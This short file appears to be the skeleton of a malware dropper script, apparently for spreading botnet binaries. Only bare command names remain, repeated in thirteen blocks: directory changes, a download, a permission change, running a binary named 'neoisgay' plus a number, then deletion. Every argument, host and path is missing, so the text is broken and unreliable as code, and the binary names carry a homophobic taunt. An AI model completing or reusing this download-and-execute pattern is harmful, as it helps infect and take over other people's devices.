cd
cd
cd
cd
cd
wget
chmod
neoisgay1
rm
cd
cd
cd
cd
cd
wget
chmod
neoisgay2
rm
cd
cd
cd
cd
cd
wget
chmod
neoisgay3
rm
cd
cd
cd
cd
cd
wget
chmod
neoisgay4
rm
cd
cd
cd
cd
cd
wget
chmod
neoisgay5
rm
cd
cd
cd
cd
cd
wget
chmod
neoisgay6
rm
cd
cd
cd
cd
cd
wget
chmod
neoisgay7
rm
cd
cd
cd
cd
cd
wget
chmod
neoisgay8
rm
cd
cd
cd
cd
cd
wget
chmod
neoisgay9
rm
cd
cd
cd
cd
cd
wget
chmod
neoisgay10
rm
cd
cd
cd
cd
cd
wget
chmod
neoisgay11
rm
cd
cd
cd
cd
cd
wget
chmod
neoisgay12
rm
cd
cd
cd
cd
cd
wget
chmod
neoisgay13
rm
